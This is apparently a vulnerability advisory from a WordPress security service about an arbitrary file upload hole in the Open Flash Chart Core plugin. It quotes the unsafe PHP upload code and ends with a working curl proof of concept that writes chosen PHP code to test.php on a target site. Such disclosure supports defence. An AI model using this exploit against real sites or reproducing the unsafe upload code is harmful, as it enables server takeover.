05 Mar

Vulnerability Details: Arbitrary File Upload Vulnerability in Open Flash Chart Core

One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor what look to be hacking attempts on our websites. Through that we recently came across a request for a file, /wp-content/plugins/open-flash-chart-core-wordpress-plugin/open-flash-chart-2/php-ofc-library/ofc_upload_image.php, which would be from the plugin Open Flash Chart Core.

We immediately recognized that file as being one from the library Open Flash Charts, which was discovered to have an arbitrary file upload vulnerability in 2009. In the case of this plugin a new version was released years ago to fix this by removing the vulnerable file.

The file takes raw post data and saves it in a file with a name specified by the GET input “name”, which is an arbitrary file upload vulnerability:

21
22
23
24
25
26
27
28
29
30
31
32
$default_path = '../tmp-upload-images/';
 
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
 
// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] ); 
 
echo 'Saving your image to: '. $destination;
 
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $GLOBALS['HTTP_RAW_POST_DATA']);
fclose($jfh);

$HTTP_RAW_POST_DATA was removed as of PHP 7.0, so the vulnerability wouldn’t be exploitable if at least that version of PHP is in use.

Wider Warning

Due to the fact that the vulnerability is being targeted by hackers we are adding it to the free data that comes with our service’s companion plugin, so that even those not using our service yet can be warned if they are using a vulnerable version of the plugin.

Proof of Concept

The following proof of concept will place the specified PHP code in to the file test.php in the directory /wp-content/plugins/open-flash-chart-core-wordpress-plugin/open-flash-chart-2/tmp-upload-images/.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[PHP code]” with the PHP code you want in the uploaded file.

<?php
$curl = curl_init();
$headers = array('Content-Type: text/plain');
$data ="[PHP CODE]";
curl_setopt($curl, CURLOPT_URL, 'http://[path to WordPress]/wp-content/plugins/open-flash-chart-core-wordpress-plugin/open-flash-chart-2/php-ofc-library/ofc_upload_image.php?name=test.php');
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_exec($curl);
curl_close($curl);
?>

Leave a Reply

Your email address will not be published. Required fields are marked *